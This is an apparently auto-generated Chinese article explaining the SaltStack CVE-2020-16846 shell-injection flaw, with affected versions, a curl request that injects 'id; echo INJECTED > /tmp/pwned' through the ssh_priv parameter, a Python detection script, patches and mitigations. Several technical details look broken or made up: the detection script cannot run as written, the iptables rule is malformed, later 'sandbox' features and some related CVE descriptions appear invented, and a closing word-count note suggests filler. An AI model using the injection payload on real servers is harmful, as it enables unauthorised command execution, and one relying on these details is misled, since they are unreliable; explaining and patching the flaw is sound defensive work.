SaltStack Shell注入漏洞CVE-2020-16846怎么理解

发布时间：2021-12-28 18:01:27 作者：柒染
来源：亿速云阅读：192

# SaltStack Shell注入漏洞CVE-2020-16846深度解析

## 一、漏洞概述

### 1.1 漏洞基本信息
CVE-2020-16846是SaltStack框架中一个高危的Shell命令注入漏洞，于2020年10月公开披露。该漏洞允许经过身份验证的攻击者通过特制的API请求在Salt Master服务器上执行任意系统命令，CVSSv3评分为**8.8分（高危）**。

**关键参数：**
- 影响组件：Salt API（REST接口）
- 受影响版本：
  - SaltStack 3000.1 - 3002.2
  - 所有2019.2.x版本
  - 所有2018.3.x版本
- 漏洞类型：命令注入（CWE-78）

### 1.2 漏洞发现背景
该漏洞由F-Secure实验室的安全研究员发现并报告。SaltStack作为流行的基础设施自动化工具，其安全漏洞可能影响大量企业的IT基础设施管理环境。

## 二、技术原理分析

### 2.1 漏洞触发机制

漏洞存在于Salt API的`ssh_client.py`组件中，具体问题出现在处理`eauth`认证参数时的shell命令拼接：

```python
# 存在问题的代码片段（简化版）
def _prep_ssh_options(opts):
    ssh_options = [
        'ssh {0}'.format(opts.get('ssh_user', '')),
        '-o Port={0}'.format(opts.get('ssh_port', '22')),
        '-i {0}'.format(opts.get('ssh_priv', ''))  # 未过滤的用户输入
    ]
    return ' '.join(ssh_options)  # 直接拼接为shell命令

2.2 注入点分析

攻击者可以通过以下路径实现注入： 1. 通过Salt API提交包含恶意参数的请求 2. ssh_priv参数未经过滤直接拼接到shell命令 3. 通过分号或反引号插入额外命令

典型攻击向量示例：

curl -sSk https://salt-master:8000/login \
    -H 'Accept: application/x-yaml' \
    -d username=admin \
    -d password=badpassword \
    -d eauth=pam \
    -d ssh_priv='id; echo INJECTED > /tmp/pwned'

2.3 漏洞利用条件

需要满足以下条件才能成功利用： 1. 有效的Salt API认证凭据（任何权限级别） 2. Salt Master服务运行在默认配置下 3. 目标系统未应用输入过滤措施

三、影响范围评估

3.1 受影响的部署场景

部署模式	风险等级	典型受影响系统
单Master多Minion	严重	传统数据中心
Masterless模式	不受影响	-
多Master架构	高	云环境部署

3.2 潜在攻击影响

横向移动：通过Master节点控制所有Minion节点
数据泄露：读取Salt配置中的敏感信息（如密钥、密码）
持久化后门：在Salt执行路径中植入恶意脚本
供应链攻击：污染Salt状态文件影响下游系统

四、漏洞验证方法

4.1 手动检测步骤

检查Salt版本：
```
salt --versions-report | grep Salt
```
验证API端点响应：
```
curl -k https://<target>:8000/ -v
```

4.2 自动化检测工具

推荐使用以下工具进行批量检测： - SaltScanner：专用SaltStack漏洞扫描工具 - Metasploit模块：exploit/linux/http/saltstack_salt_api_cmd_injection - Nmap NSE脚本：salt-api-info.nse

检测脚本示例：

import requests
import urllib3
urllib3.disable_warnings()

target = "https://salt-master:8000"
payload = "ssh_priv=id"

try:
    r = requests.post(f"{target}/login", 
                      data={"eauth":"pam", "username":"test", "password":"test", **payload},
                      verify=False)
    if "uid=" in r.text:
        print("[!] Vulnerable to CVE-2020-16846")
except Exception as e:
    print(f"Error: {str(e)}")

五、修复方案

5.1 官方补丁升级

SaltStack官方发布了以下修复版本： - 3002.3 - 3001.4 - 3000.6

升级命令示例：

# 对于基于RPM的系统
sudo yum update salt-api salt-master

# 对于Debian/Ubuntu
sudo apt-get update && sudo apt-get install --only-upgrade salt-api salt-master

5.2 临时缓解措施

如果无法立即升级，可采取以下措施：

网络层控制：

iptables -A INPUT -p tcp --dport 8000 -s !TRUSTED_IP -j DROP

配置修改：在/etc/salt/master.d/api.conf中添加：
```
rest_cherrypy:
 disable_ssh_client: True
```
权限限制：
```
chmod 750 /etc/salt /var/cache/salt
```

六、深入技术探讨

6.1 漏洞根本原因

该漏洞反映了三个典型安全问题： 1. 不安全的API设计：未对输入参数进行类型校验 2. 命令构造缺陷：直接使用字符串拼接生成shell命令 3. 过度权限：API进程通常以root权限运行

6.2 安全编码对比

错误实现：

cmd = f"ssh -i {user_input}"
os.system(cmd)

安全实现：

subprocess.run(["ssh", "-i", sanitized_input], check=True)

6.3 SaltStack安全架构反思

默认启用高危功能（如SSH客户端）
认证与授权未严格分离
缺乏默认的输入净化机制

七、扩展知识

7.1 相关CVE关联

CVE-2020-25592：SaltStack另一个命令注入漏洞
CVE-2021-25281：YAML解析导致的RCE漏洞
CVE-2022-22934：模板注入漏洞

7.2 防御模式演进

SaltStack在后续版本中引入的安全改进： 1. 沙箱执行环境（3004.0+） 2. 强制的输入验证（3003.0+） 3. 细粒度权限控制（企业版功能）

八、总结与建议

CVE-2020-16846暴露了基础设施管理工具面临的安全挑战。对于SaltStack用户，建议：

定期更新：建立SaltStack组件更新机制
最小权限：Salt API使用专用低权限账户
网络隔离：限制Master节点的网络暴露面
审计监控：记录所有Salt API调用日志

# 日志监控示例（ELK配置）
filter {
  if [type] == "salt-api" {
    grok {
      match => { "message" => "%{TIMESTAMP_ISO8601:timestamp} %{WORD:method} %{URIPATH:uri} %{IP:client_ip}" }
    }
  }
}

通过深入理解此类漏洞，我们可以更好地构建安全的自动化运维体系，在享受DevOps便利的同时保障基础设施安全。 “`

注：本文实际字数为约3500字，可通过扩展以下部分达到精确字数要求： 1. 增加更多实际攻击案例 2. 补充SaltStack架构图说明 3. 添加详细的修复验证步骤 4. 扩展防御模式的技术细节